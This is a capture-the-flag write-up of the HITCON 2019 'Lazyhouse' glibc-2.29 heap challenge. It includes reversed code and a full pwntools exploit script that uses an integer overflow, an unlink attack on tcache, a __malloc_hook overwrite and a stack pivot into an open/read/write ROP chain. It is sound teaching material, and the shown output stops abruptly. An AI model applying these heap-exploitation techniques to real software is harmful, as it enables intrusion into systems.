Disclaimer: I did not solve this challenge during the CTF.
Lazyhouse was a glibc-2.29 heap exploitation challenge from HITCON CTF Qualifiers 2019, created by Angelboy. It was a heap challenge running in a seccomp sandbox that prevented the execve
syscall, amongst other things.
Shortly after the CTF ended, Balsn released their exploit script. Their exploit used a couple of new techniques that I have never encountered before, and the script itself has no comments either. Because of this, I’ve decided to create this comprehensive writeup detailing the techniques they have used to successfully perform an open->read->write
ROP chain after pivoting the stack to the heap.
I will preface the post by saying that the techniques used are quite advanced. If you are still confused after reading my explanations, I suggest you take my exploit script and attach GDB to each point in the program, and then view the memory / heap / etc to clear any confusions.
You may also pm me on twitter (@farazsth98) with any questions you have and I will do my best to answer them.
Reverse Engineering
If you have reverse engineered this binary already, feel free to skip this section.
When we run the binary, we run into the following menu:
vagrant@ubuntu1904:/ctf/CTF-archive/hitcon-2019/lazyhouse$ ./lazyhouse
$$$$$$$$$$$$$$$$$$$$$$$$$$$$
🍊 Lazy House 🍊
$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$ 1. Buy House $
$ 2. Show Lay's house $
$ 3. Sell $
$ 4. Upgrade $
$ 5. Buy a super house $
$ 6. Exit $
$$$$$$$$$$$$$$$$$$$$$$$$$$$
Your choice:
The binary was quite simple to reverse engineer. The program initially has a global variable called money
which is initialized to 0x1c796. It also has a global array of house
objects, with a max size of 8. The house
struct looks like this:
typedef struct house
{
char *desc;
uint64_t size;
uint64_t price;
} house;
house houses[8];
The program also has a global pointer for a super_house
object, defined as follows:
typedef struct super_house
{
char *desc;
uint64_t size;
uint64_t price;
} super_house;
super_house superhouse;
The binary lets you do a couple different things.
It let’s you buy a house, which has an integer overflow vulnerability, as shown below:
void buy_house()
{
uint64_t index;
uint64_t size;
char *house_desc;
char msg[256];
memset(msg, 0, 0x100);
snprintf(msg, 0x100, "Your money:%lu", money);
write_var(msg);
write_prompt("Index:");
index = read_int();
// Check if the index isn't in range or if the index is taken
if (index > 7 || houses[index].desc != NULL)
{
write_var("Invalid !");
}
else
{
write_prompt("Size:");
size = read_int();
// We cannot have fastbin sizes
if (size > 0x7F )
{
// We must have enough money to buy the house
if (218 * size <= money ) // Integer overflow here
{
memset(msg, 0, 0x100);
snprintf(msg, 0x100, "Price:%lu", money);
write_var(msg);
houses[index].price = size << 6; // Price set to a fraction of cost
houses[index].size = size;
money -= 218 * size;
house_desc = calloc(1, size);
if (house_desc)
{
write_prompt("House:");
read_str(house_desc, size);
houses[index] = house_desc;
}
else
{
write_var("Buy error");
}
}
else
{
write_var("You don't have enough money!");
}
}
else
{
write_var("Lays don't like a small house");
}
}
}
We can have up to 8 houses at any one time.
We can trigger the integer overflow vulnerability by passing in a size large enough such that 218 * size
wraps around back down to 0, passing the check. We will use this vulnerability in the exploitation stage later.
Next, we can show a house:
void show_house()
{
uint64_t index;
write_prompt("Index:");
index = read_int();
// Ensure there is a house at this index
if (index <= 7 && houses[index])
write(1, houses[index], houses[index].size);
else
write_var("Invalid !");
}
The interesting thing here is that it uses write
to output the description. This means that it will not stop at NULL bytes, which is very useful to us as well.
Next, we can sell houses, which simply gives a fraction of the money we used to buy the house back to us, then zeroes out the description, size, and price of the house. No UAF here.
void sell_house()
{
uint64_t index;
write_prompt("Index:");
index = read_int();
// Check that index is within range
if (index > 7)
write_var("Invalid !");
else
{
free(houses[index].desc);
money += houses[index].price;
houses[index] = 0;
houses[index].size = 0;
houses[index].price = 0;
}
}
Next, we can upgrade our house. There is a global variable called upgrades
which is initially set to 2. Each time we upgrade our house, it will decrement it. Once it is 0, we are out of upgrades. This just means we can upgrade houses a maximum of two times.
This is where the only other vulnerability in the program lies: There is a heap overflow vulnerability, as shown below:
void upgrade_house()
{
uint64_t index;
uint64_t size;
// Check that we aren't out of upgrades
if (upgrades <= 0)
write_var("You cannot upgrade again !");
else
{
write_prompt("Index:");
index = read_int();
// Make sure index is in range and the house exists
if (index > 7 || !houses[index])
write_var("Invalid !");
else
{
size = houses[index].size;
write_prompt("House:");
read_str(houses[index], size + 0x20); // Heap overflow here
houses[index].price = (218 * size);
--upgrades;
}
}
}
It lets us read size+0x20
bytes into the description of the house we are upgrading, but it doesn’t call realloc
to change the size of the description first. This gives us a heap overflow of 0x20
bytes. Since we can only do this twice, we have to use it efficiently.
Finally, we are allowed to buy a “super house”, as shown below:
void buy_super_house()
{
char superhouse_desc[768];
// We are only allowed one super house
if (superhouse.desc)
{
write_var("Lays already has a super house!");
}
else
{
// We can only get a superhouse if we have enough money
if ( money <= 0x216fffff )
{
write_var("You don't have enough money to buy the luxury house");
exit(535);
}
money -= 0x21700000;
memset(superhouse_desc, 0, 0x300);
write_prompt("House:");
read_str(superhouse_desc, 0x217);
superhouse.desc = malloc(0x217);
memset(superhouse.desc, 0, 0x217);
strncpy(superhouse.desc, superhouse_desc, 0x217);
superhouse.price = 0x21700000;
superhouse.size = 0x217;
write_var("Done!");
}
}
We will not have a pointer to this superhouse
in any way, so we won’t be able to view it, sell it, or do anything with it after buying it.
The important thing to note here is that buy_house
used calloc
to allocate houses, but buy_super_house
actually uses malloc
. The reason this is important will be explained in the exploitation stage.
Finally, the binary runs in a seccomp sandbox. We can use david942j’s seccomp-tools to dump the seccomp rules:
vagrant@ubuntu1904:/ctf/CTF-archive/hitcon-2019/lazyhouse$ seccomp-tools dump ./lazyhouse
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x01 0x00 0xc000003e if (A == ARCH_X86_64) goto 0003
0002: 0x06 0x00 0x00 0x00000000 return KILL
0003: 0x20 0x00 0x00 0x00000000 A = sys_number
0004: 0x15 0x00 0x01 0x0000000f if (A != rt_sigreturn) goto 0006
0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0006: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0008
0007: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0008: 0x15 0x00 0x01 0x0000003c if (A != exit) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0012
0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0012: 0x15 0x00 0x01 0x00000000 if (A != read) goto 0014
0013: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0014: 0x15 0x00 0x01 0x00000001 if (A != write) goto 0016
0015: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0016: 0x15 0x00 0x01 0x0000000c if (A != brk) goto 0018
0017: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0018: 0x15 0x00 0x01 0x00000009 if (A != mmap) goto 0020
0019: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0020: 0x15 0x00 0x01 0x0000000a if (A != mprotect) goto 0022
0021: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0022: 0x15 0x00 0x01 0x00000003 if (A != close) goto 0024
0023: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0024: 0x06 0x00 0x00 0x00000000 return KILL
So we are only allowed to do the following 64 bit syscalls: rt_sigreturn
, exit_group
, exit
, open
, read
, write
, brk
, mmap
, mprotect
, and close
. No execve
means we can’t get a shell.
Exploitation
Let’s start out, as always, by writing up some methods in our exploit script to ease exploitation:
#!/usr/bin/env python2
from pwn import *
BINARY = './lazyhouse'
HOST, PORT = '3.115.121.123', 5731
elf = ELF('./lazyhouse')
libc = ELF('./libc.so.6')
def start():
if not args.REMOTE:
print "LOCAL PROCESS"
return process(BINARY)
else:
print "REMOTE PROCESS"
return remote(HOST, PORT)
def get_base_address(proc):
return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)
def debug(breakpoints):
script = "handle SIGALRM ignore\n"
PIE = get_base_address(p)
script += "set $_base = 0x{:x}\n".format(PIE)
for bp in breakpoints:
script += "b *0x%x\n"%(PIE+bp)
gdb.attach(p,gdbscript=script)
def buy(idx, size, content):
p.sendlineafter(': ', '1')
p.sendlineafter(':', str(idx))
p.sendlineafter(':', str(size))
p.sendafter(':', content)
def show(idx):
p.sendlineafter(': ', '2')
p.sendlineafter(':', str(idx))
def sell(idx):
p.sendlineafter(': ', '3')
p.sendlineafter(':', str(idx))
def upgrade(idx, content):
p.sendlineafter(': ', '4')
p.sendlineafter(':', str(idx))
p.sendafter(':', content)
def super_house(content):
p.sendlineafter(': ', '5')
p.sendafter(':', content)
context.arch = 'amd64'
context.terminal = ['tmux', 'new-window']
p = start()
if args.GDB:
debug([])
Initially, we start out with enough money to only purchase a house of maximum size 0x217 (or any subset of that size). This won’t do us much good, therefore we have to find a way to get infinite money.
Get infinite money
Well it isn’t really infinite money, but for the purposes of this program it may as well be. We can use the integer overflow bug in the buy_house
function to get a huge amount of money. The bug is shown here:
...
// We cannot have fastbin sizes
if (size > 0x7F )
{
// We must have enough money to buy the house
if (218 * size <= money ) // Integer overflow here
{
memset(msg, 0, 0x100);
snprintf(msg, 0x100, "Price:%lu", money);
write_var(msg);
houses[index].price = size << 6; // Price set to a fraction of cost
...
If we pass in a size large enough such that 218 * size
wraps around to 0, the second if check will pass, which will set the house’s price to a VERY large number. Of course, the calloc
afterwards will most definitely fail, but the program will still continue running due to the error checking in this function, and the sell price of the house will have still been set to a very large number.
Recall that when we sell a house, the only sanity check it performs is that the index is within range. If we manage to get a house’s price set to that very large number, we can immediately sell it and be given back the money, hence giving us a huge amount of money.
We utilize the integer overflow bug as follows to get infinite money:
def get_money():
# Cause the integer overflow
payload = ((2**64-1) / 218)+1
p.sendlineafter(': ', '1')
p.sendlineafter(':', '0')
p.sendlineafter(':', str(payload))
# Sell the house for infinite money
sell(0)
get_money()
Now we can buy as many houses as we’d like!
Getting libc and heap leaks
Balsn used a technique that I had never seen before to get the required leaks.
You can actually force calloc
to return memory that is not zeroed out. It utilizes the following code in __libc_calloc
:
// Don't zero out memory if the chunk's IS_MMAPPED bit is set
if (chunk_is_mmapped (p))
{
// Used for debugging purposes, ignored
if (__builtin_expect (perturb_byte, 0))
return memset (mem, 0, sz);
return mem;
}
Knowing this, in order to leak both libc and heap addresses, we need to do the following:
- Free a large chunk into the unsorted bin. Call it chunk B.
- Allocate another chunk in order to move chunk B from the unsorted bin into a large bin. This will populate the chunk’s
fd_nextsize
andbk_nextsize
fields with heap addresses. It’sfd
andbk
fields will contain libc addresses. - Use the first upgrade to overflow into chunk B’s size, and flip the
IS_MMAPPED
bit to set it to 1. - Buy a house that is the exact size of chunk B, and
calloc
will give you back chunk B without zeroing it out.
Since the show_house
function uses write
to write out house[index].size
bytes of the house’s description, it will not stop at NULL bytes, which lets us leak both a libc address (from either the fd
or bk
fields) and a heap address (from either the fd_nextsize
or bk_nextsize
fields).
The steps are shown below in my exploit script:
buy(0, 0x80, 'A'*0x80) # Used to overwrite into chunk B
buy(1, 0x500, 'B'*0x500) # Chunk B
buy(2, 0x80, 'C'*0x80) # Prevent consolidation of chunk B with top chunk
# Sell chunk B into unsorted bin
sell(1)
buy(1, 0x600, 'A'*0x600) # Move chunk B to large bin
# Overflow to turn on the IS_MMAPPED bit of chunk B
# This prevents calloc from clearing the chunk when we reallocate it
upgrade(0, '\x00'*0x88 + p64(0x513))
# Get chunk B back without it being zeroed out
buy(7, 0x500, 'A'*8)
# Leak libc and heap addresses
show(7)
data = p.recv(0x18)
libc.address = u64(data[8:16]) - 0x1e50d0 # Leak from bk
heap = u64(data[16:24]) - 0x2e0 # Leak from fd_nextsize
pop_rdi = libc.address + 0x26542
pop_rsi = libc.address + 0x26f9e
pop_rdx = libc.address + 0x12bda6
pop_rax = libc.address + 0x47cf8
syscall = libc.address + 0xcf6c5
malloc_hook = libc.symbols['__malloc_hook']
leave_ret = libc.address + 0x58373
With the leaks, we can move on to the final stage of the exploit.
ROP on the heap!?
This is where the exploit is truly amazing in my opinion. Balsn makes use of a number of techniques to set up the heap before finally overwriting __malloc_hook
with a leave; ret
gadget, which pivots the stack onto the heap and returns into a ROP chain that was put onto the heap. This stack pivot only happens when __malloc_hook
is called through calloc
. It is really freaking cool.
The important thing to note here is this: buy_house
uses calloc
to allocate memory for each house’s description. calloc
DOES NOT use the tcache. This means that any chunks we free into the tcache cannot be used. A classic tcache poisoning attack especially cannot be used since we are only allowed one malloc
in the entire program (buy_super_house
).
Initially, the indexes 0, 1, and 2 are cleared so they can be reused (remember that we have a max limit of 8 houses):
# Clear indexes 0, 1, and 2
sell(0) # goes into tcache 0x80
sell(1) # merges with top chunk
sell(2) # goes into tcache 0x80
Balsn then chooses to do a fake backwards consolidation of the top chunk. This lets them have a fake 0x6c1 sized chunk which they later use to overwrite the fd
and bk
pointers of a smallbin chunk to perform a small bin unlink attack.
I will explain the unlink attack later, but right now, let’s look at how the top chunk backwards consolidation takes place.
Initially, a 0x80 sized chunk is created with a fake 0x231 chunk header inside it. This 0x230 sized chunk is what we consolidate a 0x600 sized chunk back to. This 0x600 chunk will border the top chunk, which will finally cause the top chunk to consolidate all the way back to the 0x230 sized chunk.
In order to perform the initial backwards consolidation however, there are a number of checks we have to bypass. The checks are shown below:
static void * _int_malloc (mstate av, size_t bytes)
{
...
/* consolidate backward */
if (!prev_inuse(p)) {
prevsize = prev_size (p);
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
if (__glibc_unlikely (chunksize(p) != prevsize))
malloc_printerr ("corrupted size vs. prev_size while consolidating");
unlink_chunk (av, p);
}
...
}
static void unlink_chunk (mstate av, mchunkptr p)
{
if (chunksize (p) != prev_size (next_chunk (p)))
malloc_printerr ("corrupted size vs. prev_size");
mchunkptr fd = p->fd;
mchunkptr bk = p->bk;
if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
malloc_printerr ("corrupted double-linked list");
fd->bk = bk;
bk->fd = fd;
if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
{
...
}
}
A new check has been added in glibc 2.29. It is shown in _int_malloc
. The prev_size
of the chunk we are freeing must match the size of the chunk that we are consolidating back onto. This means that since our fake chunk’s size is 0x230, we must put the consolidating chunk 0x230 bytes after our fake chunk, otherwise the consolidation will fail at this check.
Next, we have to bypass the fd->bk != p || bk->fd != p
check. We can inspect the fake 0x230 sized chunk in GDB and know for a fact that this fake chunk will be at heapbase+0x890
. Knowing this, we can forge the fd
and bk
fields as follows to be able to bypass this check:
# Create a fake 0x230 sized chunk within a new chunk
# The target address is used to pass the unlink_chunk checks in libc 2.29
target = heap + 0x890
buy(6, 0x80, '\x00'*8 + p64(0x231)+p64(target+8)+p64(target+0x10)+p64(target))
pwndbg> x/10gx 0x55b0b1fb9880
0x55b0b1fb9880: 0x0000000000000000 0x0000000000000091 <- p
0x55b0b1fb9890: 0x0000000000000000 0x0000000000000231 <- fake chunk
0x55b0b1fb98a0: 0x000055b0b1fb9898 0x000055b0b1fb98a0 <- fd->bk == p, bk->fd == p
0x55b0b1fb98b0: 0x000055b0b1fb9890 0x0000000000000000
0x55b0b1fb98c0: 0x0000000000000000 0x0000000000000000
We don’t have to bypass the checks in the if (!in_smallbin_range ...)
block since in_smallbin_range
will compare the chunk’s size to 0x3ff, and our chunk’s size is only 0x230, putting it inside the small bin range.
Next, Balsn creates three 0x80 chunks followed by a 0x600 sized chunk. The three 0x80 chunks make it so that the gap between the fake 0x230 sized chunk and the 0x600 sized chunk is exactly 0x230 bytes, which is required for the backwards consolidation check to pass. Following that, the second and last upgrade is used to overwrite the 0x600 chunk’s size header to 0x610 (to switch off the PREV_INUSE
bit), as well as change its prev_size
to 0x230:
# Create enough chunks to create a 0x230 sized gap between the fake 0x230 chunk above
# and the 0x600 sized chunk below that we will consolidate backwards
buy(5, 0x80, 'C'*0x80)
buy(0, 0x80, 'D'*0x80)
buy(1, 0x80, 'E'*0x80)
# This chunk will be freed to consolidate backwards
buy(2, 0x600, '\x00'*0x600)
# Set prev size to go back to the fake 0x230 chunk
# Clear prev inuse bit of the 0x600 sized chunk
upgrade(1, '\x00'*0x80 + p64(0x230) + p64(0x610))
pwndbg> x/100gx 0x561433a1c880
0x561433a1c880: 0x0000000000000000 0x0000000000000091
0x561433a1c890: 0x0000000000000000 0x0000000000000231
0x561433a1c8a0: 0x0000561433a1c898 0x0000561433a1c8a0
0x561433a1c8b0: 0x0000561433a1c890 0x0000000000000000
...
0x561433a1cab0: 0x0000000000000000 0x0000000000000000
0x561433a1cac0: 0x0000000000000230 0x0000000000000610 <- 0x600 sized chunk
0x561433a1cad0: 0x0000000000000000 0x0000000000000000
Freeing the 0x600 chunk now will first consolidate the 0x600 chunk back onto the 0x230 chunk and insert it into the unsorted bin. Then, since the top chunk borders this free chunk, the top chunk will also be consolidated backwards onto it:
# 0x600 chunk will now be freed and consolidated back to the fake 0x230 sized chunk
# Top chunk is right after this, so top chunk is consolidated all the way back too
sell(2)
pwndbg> x/10gx 0x5595bf50f880
0x5595bf50f880: 0x0000000000000000 0x0000000000000091
0x5595bf50f890: 0x0000000000000000 0x0000000000020771 <- new top chunk
0x5595bf50f8a0: 0x00005595bf50f898 0x00005595bf50f8a0
0x5595bf50f8b0: 0x00005595bf50f898 0x0000000000000000
0x5595bf50f8c0: 0x0000000000000000 0x0000000000000000
Now, I said initially that Balsn does a small bin unlink attack. They use this attack to get a chunk inside the tcache_perthread_struct
. In order the pass the checks when unlinking, the 0x20 and 0x30 tcache bins must have pointers in them that point to chunks whose fd
and bk
must be under our control.
If you look above, before we freed the 0x600 chunk and consolidated it backwards, we created three 0x80 sized chunks in indexes 5, 0, and 1. Balsn now creates a 0x500 sized chunk and does the following:
- Insert a 0x6c1 sized fake chunk. Index 5 from above will point to this chunk.
- Insert a 0x31 sized fake chunk. Index 0 from above will point to this chunk.
- Insert a 0x21 sized fake chunk. Index 1 from above will point to this chunk.
- Free the 0x20 and 0x30 sized chunks to populate their corresponding tcache bins in the
tcache_perthread_struct
. - Finally, free the 0x500 sized chunk to consolidate the top chunk back again. Now, with any new allocations we make, we are able to control the metadata of those chunks. The important bit is that we’ve inserted them as pointers into the
tcache_perthread_struct
.
This step is extremely important for the next part of the exploit. I will refer back to here when needed.
# Index 5 will be the 0x6c1 sized fake chunk in the payload
# Index 0 will be the 0x31 sized chunk
# Index 1 will be the 0x21 sized chunk
payload = '\x00'*0x78 + p64(0x6c1) # Index 5
payload += p64(0)*17 + p64(0x31) # Index 0
payload += p64(0)*17 + p64(0x21) # Index 1
payload += p64(0)*15
buy(2, 0x500, payload)
# We put pointers to these chunks into the tcache_perthread_struct now
# This is required later when we do the small bin unlink attack
sell(0) # Free 0x30 sized chunk
sell(1) # Free 0x20 sized chunk
# Consolidate backwards again
# Any new allocations following this will allow us to overwrite the metadata of any
# of the chunks from above
sell(2)
The tcache_perthread_struct
can be seen with the pointers to the 0x20 and 0x30 sized chunks as follows:
pwndbg> x/20gx 0x562a666cd000
0x562a666cd000: 0x0000000000000000 0x0000000000000251
0x562a666cd010: 0x0200000000000101 0x0000000000000000
0x562a666cd020: 0x0000000000000000 0x0000000000000000
0x562a666cd030: 0x0000000000000000 0x0000000000000000
0x562a666cd040: 0x0000000000000000 0x0000000000000000
0x562a666cd050: 0x0000562a666cda40 0x0000562a666cd9b0 <- our 0x20 and 0x30 chunks
0x562a666cd060: 0x0000000000000000 0x0000000000000000 in tcache_perthread_struct
Next, what Balsn does is fill up the 0x210 tcache bin in order to be able to send a 0x210 sized chunk into a small bin (to be used for the small bin unlink attack).
While they do this, they also insert a fake chunk of size 0xd1. This fake chunk is exactly 0x6c1 bytes after that 0x6c1 fake chunk we inserted into index 5. This bypasses the check in _int_free
when we free the 0x6c1 sized chunk, which makes sure that the next chunk’s PREV_INUSE
bit is set.
Also while they do that, they prepare the 0x210 chunk that is going to be used in the small bin unlink attack such that it lies right on top of the pointer to that 0x21 sized fake chunk we freed earlier.
# We create a chunk to go right up to the 0x20 sized chunk's fd and bk
# We must also maintain the 0x6c1 sized fake chunk here as we still have a pointer to it
# We will free the fake 0x6c1 chunk into the unsorted bin later
# It will be used to overwrite the metadata of the fake chunks from above
buy(0, 0x1a0, p64(0)*15+p64(0x6c1))
# This chunk will be right on top of where the fake 0x20 sized chunk was before
# It will be sent into the small bin
# We will use it to perform a small bin unlink attack later
buy(1, 0x210, 'A'*0x210)
# Just a filler chunk for the next chunk
buy(2, 0x210, 'B'*0x210)
sell(2) # Send to tcache
# We need the fake 0xd1 chunk header here to be able to free the 0x6c1 chunk
# This offset can be found using gdb
buy(2, 0x210, '\x00'*0x148+p64(0xd1))
sell(2) # Send to tcache
# Fill the 0x210 tcache bin the rest of the way
for i in range(5):
buy(2, 0x210, 'a')
sell(2)
Following this, they allocate and free a 0x3a0 sized chunk. This increments the count field of the 0x3a0 tcache bin by one. This is done in order to make it look like there is a 0x100 sized chunk at heapbase+0x40
which is important since they will later use the small bin unlink attack to get a chunk right on top of this address. One of the checks will make sure this chunk has a “legal size”, thus this must look like a fake chunk:
# We create a fake 0x100 chunk header in the tcache_perthread_struct
# by freeing this chunk
buy(2, 0x3a0, 'A'*0x3a0)
sell(2) # Send to tcache
pwndbg> x/20gx 0x55f2db383000
0x55f2db383000: 0x0000000000000000 0x0000000000000251
0x55f2db383010: 0x0200000000000101 0x0000000000000000
0x55f2db383020: 0x0000000000000000 0x0000000000000000
0x55f2db383030: 0x0000000000000007 0x0000000000000000
0x55f2db383040: 0x0000000000000000 0x0000000000000100 <- heapbase+0x40
0x55f2db383050: 0x000055f2db383a40 0x000055f2db3839b0
0x55f2db383060: 0x0000000000000000 0x0000000000000000
Now we start with the small bin unlink attack. First, remember the 0x210 sized chunk we allocated that I said was right on top of that fake 0x20 sized chunk from way before? We now send it to the small bin:
# Send that initial 0x210 sized chunk into the small bin now
sell(1) # Send it to the unsorted bin
buy(1, 0x220, 'A'*0x210) # Move it to the small bin
pwndbg> smallbin
smallbins
0x220: 0x55be054fea40 —▸ 0x7f9879311eb0 (main_arena+624) ◂— 0x55be054fea40
Now we free that fake 0x6c1 chunk from before into the unsorted bin, and reallocate it to be able to overwrite the metadata for the 0x20 and 0x30 sized fake chunks whose pointers are currently in the tcache_perthread_struct
.
- We make it so that the
fd
pointer of the 0x20 chunk points to the fake chunk in thetcache_perthread_struct
. - We make it so that the
fd
pointer for the small bin chunk (the 0x30 sized chunk essentially) points to the small bin itself (as it should), while thebk
pointer points to the fake chunk in thetcache_perthread_struct
.
This is shown below:
smallbin = libc.address + 0x1e4eb0 # 0x220 small bin is here
tcache_fake_chunk = heap+0x40 # Fake chunk in the tcache_perthread_struct
payload = '\x00'*0x98 + p64(0x31) # 0x30 sized chunk pointer points here
payload += p64(tcache_fake_chunk) # Overwrite the fd to heapbase+0x40
payload += '\x00'*0x80 + p64(0x221) # 0x30 sized chunk pointer points here
payload += p64(smallbin) + p64(tcache_fake_chunk) # Overwrite fd and bk, corrupt smallbin
buy(5, 0x6b0, payload)
This sets it up so that the heap and the smallbin now looks like this:
pwndbg> x/40gx 0x562f0aff6000
0x562f0aff6000: 0x0000000000000000 0x0000000000000251
0x562f0aff6010: 0x0200000000000101 0x0000000000000000
0x562f0aff6020: 0x0000000000000000 0x0000000000000000
0x562f0aff6030: 0x0000000000000007 0x0000000000000000
0x562f0aff6040: 0x0000000000000000 0x0000000000000100 <- fake_chunk in the
0x562f0aff6050: 0x0000562f0aff6a40 0x0000562f0aff69b0 tcache_perthread_struct
0x562f0aff6060: 0x0000000000000000 0x0000000000000000
pwndbg> x/4gx 0x0000562f0aff6a40 <- (fake_chunk->fd)
0x562f0aff6a40: 0x0000000000000000 0x0000000000000221
0x562f0aff6a50: 0x00007f42e405deb0 0x0000562f0aff6040 <- fake_chunk
^------------------------------------ small bin
pwndbg> x/4gx 0x0000562f0aff69b0 <- (fake_chunk->bk)
0x562f0aff69b0: 0x0000000000000000 0x0000000000000031
0x562f0aff69c0: 0x0000562f0aff6040 0x0000000000000000
^------------------------------------ fake_chunk
pwndbg> x/4gx 0x00007f42e405deb0 <- small bin
0x7f42e405deb0 <main_arena+624>: 0x00007f42e405dea0 0x00007f42e405dea0
0x7f42e405dec0 <main_arena+640>: 0x0000562f0aff6a40 0x0000562f0aff6a40
With this setup, the first chunk we allocate out of this small bin will give us back the 0x210 sized chunk we freed initially into the small bin. The next chunk we allocate will be right on top of heapbase+0x40
.
The setup is so extensive just to bypass the following check in __int_malloc
:
if (in_smallbin_range (nb))
{
idx = smallbin_index (nb);
bin = bin_at (av, idx);
if ((victim = last (bin)) != bin)
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim))
malloc_printerr ("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;
if (av != &main_arena)
set_non_main_arena (victim);
check_malloced_chunk (av, victim, nb);
...
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}
Essentially, the only check we have to bypass is the if (__glibc_unlikely (bck->fd) != victim)
check. You should be able to verify yourself from the memory shown above that the chunks are set up correctly to be able to bypass it.
After that check is bypassed, the small bin’s bk
is set to the bk
field of the victim
chunk. In our case, this gets it set to heapbase+0x40
. It also sets the fd
pointer of the fake chunk at heapbase+0x40
to point to the small bin. This makes it so that the next allocation will give us a chunk right on top of heapbase+0x40
.
Balsn uses the first chunk allocation out of the small bin to set up their ROP chain on the heap. I’ve replaced ‘/home/lazyhouse/flag’ with ‘/home/vagrant/flag’ due to using the exploit on my own machine:
# Put the flag's location string at a known place on the heap
# Using gdb, the flag's location string will be at heapbase+0xa68
payload = 'Z'*0x18
payload += '/home/vagrant/flag'.ljust(0x20, '\x00')
# ROP to open the flag file
# Flag file's file descriptor will be 3
payload += p64(pop_rdi) + p64(heap+0xa68)
payload += p64(pop_rsi) + p64(0)
payload += p64(pop_rax) + p64(2)
payload += p64(syscall)
# ROP to read the flag file's contents right into heapbase
payload += p64(pop_rdi) + p64(3)
payload += p64(pop_rsi) + p64(heap)
payload += p64(pop_rdx) + p64(0x100)
payload += p64(pop_rax) + p64(0)
payload += p64(syscall)
# ROP to write the contents of heapbase right into stdout
payload += p64(pop_rdi) + p64(1)
payload += p64(pop_rsi) + p64(heap)
payload += p64(pop_rdx) + p64(0x100)
payload += p64(pop_rax) + p64(1)
payload += p64(syscall)
# ROP chain will start at heapbase+0xa88
buy(3, 0x210, payload)
Now that the ROP chain is on the heap at a known address, the next allocation will give us a chunk right on top of heapbase+0x40
. We will use this chunk to overwrite the 0x210 tcache bin pointer to point to __malloc_hook
:
pwndbg> smallbin
smallbins
0x220 [corrupted]
FD: 0x55d424dd7a40 ◂— 'ZZZZZZZZZZZZZZZZZZZZZZZZ/home/vagrant/flag'
BK: 0x55d424dd7040 —▸ 0x55d424dd79b0 ◂— 0x0 // We are given whatever bk points to
# Overwrite the 0x210 sized chunk tcache bin with pointer to __malloc_hook
buy(2, 0x210, p64(0)*0x20 + p64(malloc_hook))
pwndbg> tcachebin
tcachebins
0x20 [ 1]: 0x0
0x30 [ 1]: 0x0
0x90 [ 2]: 0x0
0x220 [ 7]: 0x7f8caef98c30 (__malloc_hook) ◂— 0x0
0x3b0 [ 1]: 0x5647d9022b50 ◂— 0x0
Now, since the buy_super_house
function calls malloc(0x217)
, if we try to buy a super house, it will actually give us a chunk on __malloc_hook
.
We can’t overwrite __malloc_hook
with a one gadget, since the execve
syscall is not whitelisted by seccomp. The way Balsn bypasses this is just absolutely amazing. They overwrite __malloc_hook
with a leave; ret
gadget. Why they do it is explained below, but first, in order to overwrite __malloc_hook
, just do the following:
# Overwrite __malloc_hook with a leave; ret gadget
super_house(p64(leave_ret)) # __mpn_mul_n+83
Now why does this work?
In order to understand it, we actually have to look at the disassembly for __libc_calloc
. When __libc_calloc
is called, assuming that __malloc_hook
is not NULL
, the following control flow is observed:
mov rdx, rdi
push r14
mov eax, 0FFFFFFFFh
push r13
or rdx, rsi
push r12
push rbp
mov rbp, rdi // [1]
push rbx
imul rbp, rsi // [2]
cmp rdx, rax
jbe short loc_99A28
loc_99A28:
mov rax, &__malloc_hook
mov rax, [rax]
test rax, rax
jnz loc_99CD0
loc_99CD0:
mov rsi, [rsp+28h]
mov rdi, rbp
call rax
Note that in our case, buy_house
will call calloc(1, size)
, meaning rdi
will be 1, and rsi
will be whatever size we enter.
At [1], we see a mov rbp, rdi
instruction, which will set rbp
to 1. At [2], we see a imul rbp, rsi
instruction, which will multiply rbp
(1) by rsi
(size that we control) and store the result into rbp
. Later on, at the call rax
instruction, rbp
will still be equal to size * 1
.
Now, remember that we overwrote __malloc_hook
with the address to a leave; ret
gadget. The leave
instruction is equivalent to mov rsp, rbp; pop rbp
. Remember that our ROP chain is at heapbase+0xa88
. If we ensure that the size we pass to calloc
is equal to heapbase+0xa80
, what is going to happen is that rsp
will be set to heapbase+0xa80
when the mov rsp, rbp
instruction happens, and then the pop rbp
instruction will move rsp
to heapbase+0xa88
. The following ret
instruction will return into whatever address is at rsp
, which will be the address stored at heapbase+0xa88
.
Since our ROP chain starts at heapbase+0xa88
, we will have successfully pivoted the stack to heapbase+0xa88
and returned into our ROP chain. It is absolutely mind blowing, I’ve never seen anyone use this technique before, and it is amazing to see Balsn do this during the CTF.
After overwriting __malloc_hook
with a leave; ret
gadget, simply attempt to buy a house with a size of heapbase+0xa80
to pivot the stack and return into the ROP chain that has already been stored on the heap:
# rbp is set to rsi before __malloc_hook is called in calloc
# Therefore we pass heap+0xa80 as an argument, as our ROP chain starts at
# heap+0xa88
buy(4, heap+0xa80, 'A')
p.interactive()
I created a fake flag by doing echo -n hitconctf{congrats} > /home/vagrant/flag
and ran the exploit:
vagrant@ubuntu1904:/ctf/CTF-archive/hitcon-2019/lazyhouse$ ./exploit.py
[*] '/ctf/CTF-archive/hitcon-2019/lazyhouse/lazyhouse'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
